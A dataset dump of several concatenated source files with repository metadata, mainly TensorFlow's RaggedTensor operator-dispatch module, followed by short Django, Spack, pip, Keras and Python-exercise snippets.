] | permissive | tfboyd/tensorflow | 5328b1cabb3e24cb9534480fe6a8d18c4beeffb8 | 865004e8aa9ba630864ecab18381354827efe217 | refs/heads/master | 2021-07-06T09:41:36.700837 | 2019-04-01T20:21:03 | 2019-04-01T20:26:09 | 91,494,603 | 3 | 0 | Apache-2.0 | 2018-07-17T22:45:10 | 2017-05-16T19:06:01 | C++ | UTF-8 | Python | false | false | 19,006 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operator dispatch for RaggedTensors."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import gen_bitwise_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_array_ops
from tensorflow.python.ops.ragged import ragged_batch_gather_ops
from tensorflow.python.ops.ragged import ragged_concat_ops
from tensorflow.python.ops.ragged import ragged_gather_ops
from tensorflow.python.ops.ragged import ragged_math_ops
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_shape
from tensorflow.python.ops.ragged import ragged_util
from tensorflow.python.ops.ragged import ragged_where_op
from tensorflow.python.util import dispatch
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_export
from tensorflow.python.util import tf_inspect
# @TODO(edloper): Set this to True in the CL that exports RaggedTensors.
# When True, registering a dispatcher also appends a "may be a
# `tf.RaggedTensor`" note to the wrapped op's public docstring.
_UPDATE_DOCSTRINGS = False
# Information about an argument to an operation: The name of the argument, its
# position in the argument list, and a boolean flag indicating whether it
# expects a list of tensors.
_ArgInfo = collections.namedtuple('ArgInfo', ['name', 'position', 'is_list'])
def _get_arg_infos(func, arg_names):
  """Returns an `_ArgInfo` for each argument of `func` specified by `arg_names`.

  Args:
    func: The function whose arguments should be described.
    arg_names: The names of the arguments to get info for.  A name wrapped in
      square brackets (e.g. `'[values]'`) marks a list-of-tensors argument.

  Returns:
    A list of `_ArgInfo`s, one per entry in `arg_names`.
  """
  spec_args = tf_inspect.getargspec(func).args
  infos = []
  for name in arg_names:
    assert isinstance(name, str)
    wants_list = name.startswith('[') and name.endswith(']')
    bare_name = name[1:-1] if wants_list else name
    if bare_name not in spec_args:
      raise ValueError('Argument %r not found function in %s. Args=%s' %
                       (bare_name, func, spec_args))
    infos.append(_ArgInfo(bare_name, spec_args.index(bare_name), wants_list))
  return infos
def _is_convertible_to_tensor(value):
  """Returns true if `value` is convertible to a `Tensor`."""
  # Cheap checks first: None and the common tensor-like Python types.
  if value is None:
    return True
  tensor_like = (ops.Tensor, variables.Variable, np.ndarray, int, float, str)
  if isinstance(value, tensor_like):
    return True
  if isinstance(value, sparse_tensor.SparseTensor):
    return False
  # Fall back to attempting the conversion itself.
  try:
    ops.convert_to_tensor(value)
  except (TypeError, ValueError):
    return False
  return True
class UnaryRaggedElementwiseDispatcher(dispatch.OpDispatcher):
  """OpDispatcher for unary ops that map a base op across ragged values."""

  def __init__(self, original_op, arg_is_list=False):
    """Wraps `original_op`; `arg_is_list` marks ops whose first argument is a
    list of tensors (e.g. `add_n`) rather than a single tensor."""
    self._original_op = original_op
    self._arg_is_list = arg_is_list
    arg_names = tf_inspect.getfullargspec(original_op)[0]
    # Name of the first positional argument: the potentially-ragged input.
    self._x = arg_names[0]
    if _UPDATE_DOCSTRINGS:
      original_op.__doc__ = (
          original_op.__doc__.rstrip() + '\n\n' +
          '    `{x}` may be a `tf.RaggedTensor`.\n'.format(x=self._x))

  def handle(self, args, kwargs):
    """Applies the wrapped op to the flat values, or returns NOT_SUPPORTED."""
    # Extract the (possibly ragged) first argument, positionally or by name.
    if args:
      x, args = args[0], args[1:]
    else:
      kwargs = kwargs.copy()
      x = kwargs.pop(self._x, None)
    if x is None:
      return self.NOT_SUPPORTED
    if self._arg_is_list:
      found_ragged = False
      for elt in x:
        if ragged_tensor.is_ragged(elt):
          found_ragged = True
        elif not _is_convertible_to_tensor(elt):
          return self.NOT_SUPPORTED
      if found_ragged:
        # All ragged inputs must share identical nested row splits; assert
        # that, then apply the op to the flat values of every element.
        nested_splits_lists = [
            elt.nested_row_splits for elt in x if ragged_tensor.is_ragged(elt)
        ]
        flat_values = [
            elt.flat_values if ragged_tensor.is_ragged(elt) else elt
            for elt in x
        ]
        with ops.control_dependencies(
            ragged_util.assert_splits_match(nested_splits_lists)):
          return ragged_tensor.RaggedTensor.from_nested_row_splits(
              self._original_op(flat_values, *args, **kwargs),
              nested_splits_lists[0])
      else:
        return self.NOT_SUPPORTED
    else:
      found_ragged = ragged_tensor.is_ragged(x)
      if found_ragged:
        # Map the op across flat_values, keeping x's row partitioning.
        mapped_values = self._original_op(x.flat_values, *args, **kwargs)
        return x.with_flat_values(mapped_values)
      else:
        return self.NOT_SUPPORTED
class BinaryRaggedElementwiseDispatcher(dispatch.OpDispatcher):
  """OpDispatcher for binary ops that map a base op across ragged values.

  Supports broadcasting.
  """

  def __init__(self, original_op):
    self._original_op = original_op
    arg_names = tf_inspect.getfullargspec(original_op)[0]
    # Names of the two positional arguments, either of which may be ragged.
    self._x = arg_names[0]
    self._y = arg_names[1]
    if _UPDATE_DOCSTRINGS:
      original_op.__doc__ = (
          original_op.__doc__.rstrip() + '\n\n' +
          '    `{x}` and `{y}` may be a `tf.RaggedTensor`.\n'.format(
              x=self._x, y=self._y))

  def handle(self, args, kwargs):
    """Applies the wrapped op elementwise, broadcasting ragged shapes."""
    # Extract the binary args.
    if len(args) > 1:
      x = args[0]
      y = args[1]
      args = args[2:]
    elif args:
      kwargs = kwargs.copy()
      x = args[0]
      y = kwargs.pop(self._y, None)
      args = args[1:]
    else:
      kwargs = kwargs.copy()
      x = kwargs.pop(self._x, None)
      y = kwargs.pop(self._y, None)
    # Bail if we don't have at least one ragged argument.
    x_is_ragged = ragged_tensor.is_ragged(x)
    y_is_ragged = ragged_tensor.is_ragged(y)
    if not (x_is_ragged or y_is_ragged):
      return self.NOT_SUPPORTED
    # Convert args to tensors.  Bail if conversion fails.
    try:
      if not x_is_ragged:
        x = ops.convert_to_tensor(x, name=self._x, preferred_dtype=y.dtype)
      if not y_is_ragged:
        y = ops.convert_to_tensor(y, name=self._y, preferred_dtype=x.dtype)
    except (TypeError, ValueError):
      return self.NOT_SUPPORTED
    # Broadcast the two operands to a common ragged shape unless the dense
    # operand's rank already fits inside the ragged operand's flat values.
    if ((x_is_ragged and y_is_ragged) or
        (x_is_ragged and x.flat_values.shape.ndims <= y.shape.ndims) or
        (y_is_ragged and y.flat_values.shape.ndims <= x.shape.ndims)):
      bcast_shape = ragged_tensor_shape.broadcast_dynamic_shape(
          ragged_tensor_shape.RaggedTensorDynamicShape.from_tensor(x),
          ragged_tensor_shape.RaggedTensorDynamicShape.from_tensor(y))
      x = ragged_tensor_shape.broadcast_to(
          x, bcast_shape, broadcast_inner_dimensions=False)
      y = ragged_tensor_shape.broadcast_to(
          y, bcast_shape, broadcast_inner_dimensions=False)
    # Apply the op to the flat values and re-attach the row partitioning.
    x_values = x.flat_values if ragged_tensor.is_ragged(x) else x
    y_values = y.flat_values if ragged_tensor.is_ragged(y) else y
    mapped_values = self._original_op(x_values, y_values, *args, **kwargs)
    if ragged_tensor.is_ragged(x):
      return x.with_flat_values(mapped_values)
    else:
      return y.with_flat_values(mapped_values)
class RaggedDispatcher(dispatch.OpDispatcher):
  """OpDispatcher for ragged ops.

  Dispatches to a wrapped op-handler if at least one of the `tensor_args`
  arguments is a RaggedTensor or a RaggedTensorValue; and all of the
  `tensor_args` arguments are convertible to Tensor or RaggedTensor.
  """

  def __init__(self, original_op, ragged_op, ragged_args):
    """Wraps `ragged_op` as the handler for `original_op`.

    Raises:
      AssertionError: if the two ops' argument names do not match exactly.
    """
    op_arg_names = tf_inspect.getfullargspec(original_op)[0]
    ragged_arg_names = tf_inspect.getfullargspec(ragged_op)[0]
    if op_arg_names != ragged_arg_names:
      raise AssertionError(
          'Signature must exactly match when overriding %s with %s: %s vs %s' %
          (original_op, ragged_op, op_arg_names, ragged_arg_names))
    self._ragged_op = ragged_op
    self._ragged_args = _get_arg_infos(ragged_op, ragged_args)
    if _UPDATE_DOCSTRINGS:
      arg_list = ' and '.join('`%s`' % arg for arg in ragged_args)
      original_op.__doc__ = (
          original_op.__doc__.rstrip() + '\n\n' +
          '    {0} may be a `tf.RaggedTensor`.\n'.format(arg_list))

  def handle(self, args, kwargs):
    """Delegates to the ragged op, or returns NOT_SUPPORTED."""
    if self.is_supported(args, kwargs):
      return self._ragged_op(*args, **kwargs)
    else:
      return self.NOT_SUPPORTED

  def is_supported(self, args, kwargs):
    """True iff at least one ragged arg is ragged and all are convertible."""
    found_ragged = False
    for arg_info in self._ragged_args:
      # Locate the argument positionally or by keyword.
      if arg_info.position < len(args):
        arg = args[arg_info.position]
      else:
        arg = kwargs.get(arg_info.name, None)
      if arg_info.is_list:
        if not isinstance(arg, (list, tuple)):
          return False
        for elt in arg:
          if ragged_tensor.is_ragged(elt):
            found_ragged = True
          elif not _is_convertible_to_tensor(elt):
            return False
      else:
        if ragged_tensor.is_ragged(arg):
          found_ragged = True
        elif not _is_convertible_to_tensor(arg):
          return False
    return found_ragged
def ragged_dispatch(original_op, tensor_args):
  """Decorator that registers the decorated function as the ragged handler
  for `original_op`.

  Args:
    original_op: The op to override for ragged inputs.
    tensor_args: Names of the arguments that may be ragged (list-valued
      argument names are wrapped in square brackets).

  Returns:
    A decorator for the ragged implementation.
  """
  def decorator(ragged_op):
    # BUG FIX: `RaggedDispatcher` is defined in this module; the `dispatch`
    # util module has no such attribute, so `dispatch.RaggedDispatcher`
    # raised an AttributeError whenever this decorator was applied.
    RaggedDispatcher(original_op, ragged_op, tensor_args).register(original_op)
    return ragged_op
  return decorator
# Unary elementwise ops: applied to the `flat_values` of a single (possibly
# ragged) input, preserving the input's row partitioning.
_UNARY_ELEMENTWISE_OPS = [
    array_ops.check_numerics,
    array_ops.identity,
    array_ops.ones_like,
    array_ops.ones_like_v2,
    array_ops.zeros_like,
    array_ops.zeros_like_v2,
    clip_ops.clip_by_value,
    gen_bitwise_ops.invert,
    math_ops.abs,
    math_ops.acos,
    math_ops.acosh,
    math_ops.angle,
    math_ops.asin,
    math_ops.asinh,
    math_ops.atan,
    math_ops.atanh,
    math_ops.cast,
    math_ops.ceil,
    math_ops.conj,
    math_ops.cos,
    math_ops.cosh,
    math_ops.digamma,
    math_ops.erf,
    math_ops.erfc,
    math_ops.exp,
    math_ops.expm1,
    math_ops.floor,
    math_ops.imag,
    math_ops.is_finite,
    math_ops.is_inf,
    math_ops.is_nan,
    math_ops.lgamma,
    math_ops.log,
    math_ops.log1p,
    math_ops.log_sigmoid,
    math_ops.logical_not,
    math_ops.negative,
    math_ops.real,
    math_ops.reciprocal,
    math_ops.rint,
    math_ops.round,
    math_ops.rsqrt,
    math_ops.saturate_cast,
    math_ops.sign,
    math_ops.sin,
    math_ops.sinh,
    math_ops.sqrt,
    math_ops.square,
    math_ops.tan,
    parsing_ops.decode_compressed,
    string_ops.string_to_number,
    string_ops.string_to_hash_bucket,
    string_ops.as_string,
    string_ops.decode_base64,
    string_ops.encode_base64,
    string_ops.regex_full_match,
    string_ops.regex_replace,
    string_ops.string_strip,
    string_ops.string_to_hash_bucket,
    string_ops.string_to_hash_bucket_fast,
    string_ops.string_to_hash_bucket_strong,
    string_ops.substr,
    string_ops.substr_v2,
    string_ops.string_length,
    string_ops.string_length_v2,
    string_ops.unicode_script,
]
# Unary ops whose single argument is a *list* of tensors; all ragged elements
# of the list must share the same nested row splits.
_UNARY_LIST_ELEMENTWISE_OPS = [
    math_ops.add_n,
    string_ops.string_join,
]
# Binary elementwise ops: either operand may be ragged; ragged shapes are
# broadcast before the underlying op is applied to flat values.
_BINARY_ELEMENTWISE_OPS = [
    gen_bitwise_ops.bitwise_and,
    gen_bitwise_ops.bitwise_or,
    gen_bitwise_ops.bitwise_xor,
    gen_bitwise_ops.left_shift,
    gen_bitwise_ops.right_shift,
    math_ops.add,
    math_ops.atan2,
    math_ops.complex,
    math_ops.div_no_nan,
    math_ops.divide,
    math_ops.equal,
    math_ops.floordiv,
    math_ops.floormod,
    math_ops.greater,
    math_ops.greater_equal,
    math_ops.less,
    math_ops.less_equal,
    math_ops.logical_and,
    math_ops.logical_or,
    math_ops.logical_xor,
    math_ops.maximum,
    math_ops.minimum,
    math_ops.multiply,
    math_ops.not_equal,
    math_ops.pow,
    math_ops.realdiv,
    math_ops.squared_difference,
    math_ops.subtract,
    math_ops.truediv,
    math_ops.truncatediv,
    math_ops.truncatemod,
]
# We don't need to register a separate delegation handler for these v1 ops,
# since they delegate to the v2 ops (which already have a handler). But we
# still want to include them in the ragged_op_list() output.
_V1_OPS_THAT_DELEGATE_TO_V2_OPS = [
    math_ops.reduce_sum,
    math_ops.reduce_prod,
    math_ops.reduce_min,
    math_ops.reduce_max,
    math_ops.reduce_mean,
    math_ops.reduce_any,
    math_ops.reduce_all,
]
def _ragged_gather_v1(params, indices, validate_indices=None, name=None,
                      axis=0, batch_dims=0):
  """V1 `tf.gather` signature adapter: forwards to the ragged-aware gather."""
  return ragged_gather_ops.gather(
      params=params,
      indices=indices,
      validate_indices=validate_indices,
      axis=axis,
      batch_dims=batch_dims,
      name=name)
def _ragged_gather_nd_v1(params, indices, name=None, batch_dims=0):
  """V1 `tf.gather_nd` signature adapter: forwards to the ragged gather_nd."""
  return ragged_gather_ops.gather_nd(
      params=params,
      indices=indices,
      batch_dims=batch_dims,
      name=name)
def _ragged_expand_dims_v1(input, axis=None, name=None, dim=None):  # pylint: disable=redefined-builtin
  """V1 `expand_dims` adapter: honors the deprecated `dim` alias for `axis`."""
  effective_axis = axis if dim is None else dim
  return ragged_array_ops.expand_dims(input=input, axis=effective_axis,
                                      name=name)
def _ragged_size_v1(input, name=None, out_type=dtypes.int32):  # pylint: disable=redefined-builtin
  """V1 `tf.size` signature adapter: forwards to the ragged-aware size op."""
  return ragged_array_ops.size(input=input, out_type=out_type, name=name)
# (original_op, ragged_op, ragged_args): each original op is overridden by
# the given ragged implementation whenever any of the named args is ragged.
# Argument names wrapped in square brackets (e.g. '[values]') take a list of
# tensors rather than a single tensor.
_RAGGED_DISPATCH_OPS = [
    (array_ops.batch_gather, ragged_batch_gather_ops.batch_gather,
     ['params', 'indices']),
    (array_ops.concat, ragged_concat_ops.concat, ['[values]']),
    (array_ops.expand_dims, _ragged_expand_dims_v1, ['input']),
    (array_ops.expand_dims_v2, ragged_array_ops.expand_dims, ['input']),
    (array_ops.gather, _ragged_gather_v1, ['params', 'indices']),
    (array_ops.gather_v2, ragged_gather_ops.gather, ['params', 'indices']),
    (array_ops.gather_nd, _ragged_gather_nd_v1, ['params', 'indices']),
    (array_ops.gather_nd_v2, ragged_gather_ops.gather_nd,
     ['params', 'indices']),
    (array_ops.rank, ragged_array_ops.rank, ['input']),
    (array_ops.size, _ragged_size_v1, ['input']),
    (array_ops.size_v2, ragged_array_ops.size, ['input']),
    (array_ops.stack, ragged_concat_ops.stack, ['[values]']),
    (array_ops.tile, ragged_array_ops.tile, ['input']),
    (array_ops.where, ragged_where_op.where, ['condition', 'x', 'y']),
    (math_ops.unsorted_segment_sum, ragged_math_ops.segment_sum,
     ['data', 'segment_ids']),
    (math_ops.unsorted_segment_prod, ragged_math_ops.segment_prod,
     ['data', 'segment_ids']),
    (math_ops.unsorted_segment_min, ragged_math_ops.segment_min,
     ['data', 'segment_ids']),
    (math_ops.unsorted_segment_max, ragged_math_ops.segment_max,
     ['data', 'segment_ids']),
    (math_ops.unsorted_segment_mean, ragged_math_ops.segment_mean,
     ['data', 'segment_ids']),
    (math_ops.unsorted_segment_sqrt_n, ragged_math_ops.segment_sqrt_n,
     ['data', 'segment_ids']),
    (math_ops.reduce_sum, ragged_math_ops.reduce_sum, ['input_tensor']),
    (math_ops.reduce_prod, ragged_math_ops.reduce_prod, ['input_tensor']),
    (math_ops.reduce_min, ragged_math_ops.reduce_min, ['input_tensor']),
    (math_ops.reduce_max, ragged_math_ops.reduce_max, ['input_tensor']),
    (math_ops.reduce_mean, ragged_math_ops.reduce_mean, ['input_tensor']),
    (math_ops.reduce_any, ragged_math_ops.reduce_any, ['input_tensor']),
    (math_ops.reduce_all, ragged_math_ops.reduce_all, ['input_tensor']),
]
def register_dispatchers():
  """Constructs & registers OpDispatchers for ragged ops.

  Every op listed in the module-level dispatch tables must be an exported
  TensorFlow API symbol; otherwise registration is aborted with an
  AssertionError naming the offending op.
  """
  op_list = (
      _UNARY_ELEMENTWISE_OPS + _UNARY_LIST_ELEMENTWISE_OPS +
      _BINARY_ELEMENTWISE_OPS + [x[0] for x in _RAGGED_DISPATCH_OPS])
  for op in op_list:
    _, undecorated_op = tf_decorator.unwrap(op)
    if not hasattr(undecorated_op,
                   tf_export.API_ATTRS[tf_export.TENSORFLOW_API_NAME].names):
      # Interpolate the offending op into the message; the original left the
      # %s placeholder unformatted, producing a useless error string.
      raise AssertionError('Expected %s to be an exported symbol '
                           '(while adding a RaggedTensor dispatcher)' %
                           undecorated_op)

  for op in _UNARY_ELEMENTWISE_OPS:
    UnaryRaggedElementwiseDispatcher(op).register(op)

  for op in _UNARY_LIST_ELEMENTWISE_OPS:
    UnaryRaggedElementwiseDispatcher(op, True).register(op)

  for op in _BINARY_ELEMENTWISE_OPS:
    BinaryRaggedElementwiseDispatcher(op).register(op)

  for (original_op, ragged_op, args) in _RAGGED_DISPATCH_OPS:
    RaggedDispatcher(original_op, ragged_op, args).register(original_op)
def _ragged_op_signature(op, ragged_args):
  """Returns a markdown signature for the given op, marking ragged args in bold.

  Args:
    op: The TensorFlow op (callable) to document.
    ragged_args: Positions (indices into the op's positional args) that accept
      `RaggedTensor` values.

  Returns:
    A one-line markdown bullet such as "* `tf.gather`(**params**, indices)".
  """
  op_name = tf_export.get_canonical_name_for_symbol(op)
  argspec = tf_inspect.getfullargspec(op)
  arg_names = argspec.args
  # Mark ragged arguments in bold.
  for pos in ragged_args:
    arg_names[pos] = '**' + arg_names[pos] + '**'
  # Add argument defaults.  `defaults` is None (not an empty sequence) when
  # the op takes no defaults, so guard before calling len() on it.
  if argspec.defaults:
    for pos in range(-1, -len(argspec.defaults) - 1, -1):
      arg_names[pos] += '=`{!r}`'.format(argspec.defaults[pos])
  # Add varargs and keyword args
  if argspec.varargs:
    arg_names.append('*' + argspec.varargs)
  if argspec.varkw:
    arg_names.append('**' + argspec.varkw)
  return '* `tf.{}`({})'.format(op_name, ', '.join(arg_names))
def _op_is_in_tf_version(op, version):
  # Return truthy iff `op` is exported in the requested TF API version.
  # V1 ops that merely delegate to their V2 counterparts carry no v1 export
  # name of their own, so they are whitelisted via
  # _V1_OPS_THAT_DELEGATE_TO_V2_OPS.
  if version == 1:
    return (tf_export.get_v1_names(tf_decorator.unwrap(op)[1]) or
            op in _V1_OPS_THAT_DELEGATE_TO_V2_OPS)
  elif version == 2:
    return tf_export.get_v2_names(tf_decorator.unwrap(op)[1])
  else:
    raise ValueError('Expected version 1 or 2.')
def ragged_op_list(tf_version=1):
  """Returns a string listing operators that have dispathers registered.

  Args:
    tf_version: 1 or 2; only ops exported in that API version are listed.

  Returns:
    A markdown document fragment; arguments that accept `RaggedTensor`s are
    marked in bold.
  """
  lines = []
  for op in _UNARY_ELEMENTWISE_OPS + _UNARY_LIST_ELEMENTWISE_OPS:
    if _op_is_in_tf_version(op, tf_version):
      lines.append(_ragged_op_signature(op, [0]))
  for op in _BINARY_ELEMENTWISE_OPS:
    if _op_is_in_tf_version(op, tf_version):
      lines.append(_ragged_op_signature(op, [0, 1]))
  for op, _, ragged_args in _RAGGED_DISPATCH_OPS:
    if _op_is_in_tf_version(op, tf_version):
      arginfos = _get_arg_infos(op, ragged_args)
      ragged_args = [arginfo.position for arginfo in arginfos]
      lines.append(_ragged_op_signature(op, ragged_args))
  # The original ended with "+ 'n'", appending a literal 'n' instead of a
  # trailing newline.
  return ('\n\n### Additional ops that support `RaggedTensor`\n\n'
          'Arguments that accept `RaggedTensor`s are marked in **bold**.\n\n' +
          '\n'.join(sorted(lines)) + '\n')
register_dispatchers()
| [
"[email protected]"
] | |
e8fc72f8896f37d77f9f9932b028f806a12925f8 | 0cc4eb3cb54f8394c127ace62d3108fdb5230c85 | /.spack-env/view/.spack/py-flake8/repos/builtin/packages/diffutils/package.py | 8952c702f24bcbe8abf0601da117fd30156000b2 | [] | no_license | jacobmerson/spack-develop-env | 5b2d76f58c0b64ae97c64f77a3c4d33a770c71c8 | 5fca20ca343b1a76f05fc635c87f94ed25417d94 | refs/heads/master | 2022-07-04T02:22:50.264727 | 2020-05-06T05:13:50 | 2020-05-06T05:13:50 | 261,657,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | /lore/mersoj/spack/spack/opt/spack/linux-rhel7-x86_64/gcc-7.3.0/py-flake8-3.7.8-7lq4x5astf5jpy2hbaxfomootatxdraz/.spack/repos/builtin/packages/diffutils/package.py | [
"[email protected]"
] | |
c008e0806beaccc4d9526eb954576c58d6c04a90 | 98f078b52352ab08a8c9ac08a631a7ff1ac3fa63 | /medeina/medeina/models.py | 7e1e6b0c4f8958eb78d39da777536283f8675ab5 | [] | no_license | Eimis/medeina | 160ceed5044cec5640f272190d2a14d4428f01dc | 3bd838798481f933d729f6104c8b1af29a6f587d | refs/heads/master | 2020-03-08T11:14:11.198773 | 2018-04-08T14:23:29 | 2018-04-08T14:23:29 | 128,092,274 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,119 | py | from django.contrib.auth.models import User
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from medeina.managers import IssueManager
from medeina.states import IssueStates
from django_states.fields import StateField
@python_2_unicode_compatible
class IssueCategory(models.Model):
    # A named bucket that issues are filed under; names are unique.
    name = models.CharField(max_length=20, unique=True)
    def __str__(self):
        return self.name
    class Meta:
        # Avoid the auto-generated plural "Issue categorys" in the admin.
        verbose_name_plural = 'Issue categories'
@python_2_unicode_compatible
class Issue(models.Model):
    # Custom manager with issue-specific query helpers.
    objects = IssueManager()
    solved = models.BooleanField(default=False)
    title = models.CharField(max_length=50)
    # Reverse relations: user.submitted_issues / user.solved_issues.
    submitter = models.ForeignKey(User, related_name='submitted_issues')
    solver = models.ForeignKey(User, related_name='solved_issues', null=True)
    text_description = models.TextField()
    # django_states workflow field; transitions are declared in IssueStates.
    state = StateField(machine=IssueStates)
    category = models.ForeignKey(IssueCategory)
    created_on = models.DateTimeField(auto_now_add=True)
    # Set when the issue is resolved; NULL while still open.
    solved_on = models.DateTimeField(null=True)
    def __str__(self):
        return self.title
"[email protected]"
] | |
20a2fc1f128171cfd7482a92a45a05bfee5e5344 | f37fc031e3148597efaa7698320e2dff2c230aa7 | /venv/Scripts/pip-script.py | 33dd77e099dea2e08ab6c056fa2839aa3adc0dcf | [] | no_license | XiaoZzi/Crawl | 74a4045299ee698acb75ba43cd3f378220bd763d | 3201e2d5a1b41c0023a60c09aee2ed99d1ce6115 | refs/heads/master | 2020-03-24T18:40:09.643550 | 2018-07-30T15:06:56 | 2018-07-30T15:07:59 | 142,892,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | #!F:\Crawl\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip'
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.1', 'console_scripts', 'pip')()
)
| [
"[email protected]"
] | |
b532663dbe99cf46e6de9766168e7521419f9b32 | c59194e1908bac7fc0dd4d80bef49c6afd9f91fb | /CodeSignal/Python/SlitheringInStrings/ConvertTabs.py | 5e77e7af1f1acf2c9b3f435b15c1daae37a49f38 | [] | no_license | Bharadwaja92/CompetitiveCoding | 26e9ae81f5b62f4992ce8171b2a46597353f0c82 | d0505f28fd6e93b2f4ef23ad02c671777a3caeda | refs/heads/master | 2023-01-23T03:47:54.075433 | 2023-01-19T12:28:07 | 2023-01-19T12:28:07 | 208,804,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 819 | py | """
You found an awesome customizable Python IDE that has almost everything you'd like to see in your working environment.
However, after a couple days of coding you discover that there is one important feature that this IDE lacks:
it cannot convert tabs to spaces. Luckily, the IDE is easily customizable, so you decide to write a plugin that would
convert all tabs in the code into the given number of whitespace characters.
Implement a function that, given a piece of code and a positive integer x will turn each tabulation character in code
into x whitespace characters.
Example
For code = "\treturn False" and x = 4, the output should be
convertTabs(code, x) = " return False".
"""
def convertTabs(code, x):
    """Return *code* with every tab character expanded to x spaces."""
    indent = ' ' * x
    return indent.join(code.split('\t'))
code = "\treturn False"
x = 4
print(convertTabs(code, x)) | [
"[email protected]"
] | |
1dad86a2398f0ba35ec7eae771277fb34b70e513 | 196d32dbe3d212974f90fec3fcf58ffbaf6fe654 | /reward/utils/batch.py | 34808a77074f4e623ee0de6058d2c4a6c213cd5f | [
"MIT"
] | permissive | lgvaz/reward | a4f1f418f39102225d7ee00a70fed33f1137051a | cfff8acaf70d1fec72169162b95ab5ad3547d17a | refs/heads/master | 2021-10-10T08:16:29.151557 | 2019-01-08T10:08:57 | 2019-01-08T10:08:57 | 115,865,905 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 843 | py | import numpy as np
import torch
from torch.utils.data import DataLoader, TensorDataset
from reward.utils.memories import SimpleMemory
from reward.utils import to_tensor, join_first_dims, to_np
from reward.utils.device import get
class Batch(SimpleMemory):
    # Dict-like container of rollout fields keyed by name; its length is
    # defined by the number of stored states under the "s" key.
    def __len__(self):
        return len(self["s"])
    # Apply func to every stored value / only to the given keys, returning
    # a new Batch in both cases.
    def apply_to_all(self, func): return Batch((k, func(v)) for k, v in self.items())
    def apply_to_keys(self, func, keys): return Batch((k, func(self[k])) for k in keys)
    def concat_batch(self):
        # Collapse the two leading dims into one for array-valued fields
        # (presumably (num_steps, num_envs) — TODO confirm against callers);
        # non-array fields pass through unchanged.
        func = (
            lambda x: join_first_dims(x, num_dims=2)
            if (isinstance(x, (np.ndarray, torch.Tensor)))
            else x
        )
        return self.apply_to_all(func)
    def to_tensor(self, ignore=["idx"]):
        # NOTE(review): mutable default is harmless here since `ignore` is
        # never mutated, but a tuple default would be more idiomatic.
        return Batch({k: v if k in ignore else to_tensor(v) for k, v in self.items()})
| [
"[email protected]"
] | |
6221e6442f60ee124158b3eabf124eddb05dd89f | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_exercises/templates/100_Interactive_Python_Exercises_to_Boost_Your_Python_Skill/Section 4 Data Structures and Algorithms/Coding Exercise 26 Every Seven.py | 9ed14197470bf07a70e6f73daeff5fd0cbe90d89 | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 31 | py | # ___ foo mylist
# r_ ? ||? | [
"[email protected]"
] | |
adc0b9f134e3152c574524e73f31f45144d81956 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/verbs/_savours.py | a906acbbfc694c29d8980efe7376d9c99028bb49 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py |
from xai.brain.wordbase.verbs._savour import _SAVOUR
#calss header
class _SAVOURS(_SAVOUR, ):
    # Third-person-singular form of the verb "savour"; inherits all
    # behaviour from _SAVOUR and only overrides identifying metadata.
    def __init__(self,):
        _SAVOUR.__init__(self)
        self.name = "SAVOURS"
        self.specie = 'verbs'
        self.basic = "savour"
        self.jsondata = {}
"[email protected]"
] | |
008c3ed1df59cba2c6bce0b737ac840ef68508c2 | c7f43c4cc0ee84a5fe246b67f51e30b8d726ebd5 | /keras2/keras78_03_cifar10_ResNet50.py | 3b90c7a4949262c3b1014362398e7aae04f63536 | [] | no_license | 89Mansions/AI_STUDY | d9f8bdf206f14ba41845a082e731ea844d3d9007 | d87c93355c949c462f96e85e8d0e186b0ce49c76 | refs/heads/master | 2023-07-21T19:11:23.539693 | 2021-08-30T08:18:59 | 2021-08-30T08:18:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,214 | py | # ResNet50
from tensorflow.keras.applications import ResNet50
from tensorflow.keras.datasets import cifar10
import numpy as np
import pandas as pd
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.applications.vgg16 import preprocess_input
from tensorflow.keras.layers import Dense, Flatten
